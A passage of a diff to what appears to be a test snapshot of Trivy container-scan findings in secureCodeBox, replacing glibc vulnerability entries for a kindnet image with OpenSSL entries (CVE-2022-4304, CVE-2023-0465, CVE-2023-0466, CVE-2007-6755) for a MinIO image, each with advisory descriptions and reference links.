"https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "name": "timing attack in RSA Decryption implementation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-6096", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-6096", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4954-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3326", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/01/28/2", - "https://access.redhat.com/security/cve/CVE-2021-3326", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", - "https://linux.oracle.com/cve/CVE-2021-3326.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210304-0007/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", - "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3326", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3326", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3326", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Invalid certificate policies in leaf certificates are silently ignored", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-10228", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "http://openwall.com/lists/oss-security/2017/03/01/10", - "http://www.securityfocus.com/bid/96525", - "https://access.redhat.com/security/cve/CVE-2016-10228", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", - "https://linux.oracle.com/cve/CVE-2016-10228.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2016-10228", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: iconv program can hang when invoked with the -c option", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-10228", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/03/01/10", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/96525", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-10228", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://www.openssl.org/news/secadv/20230328.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-25013", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-25013", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - "https://linux.oracle.com/cve/CVE-2019-25013.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210205-0004/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2019-25013", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", ], }, "category": "Vulnerability", - "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", + "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-25013", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": 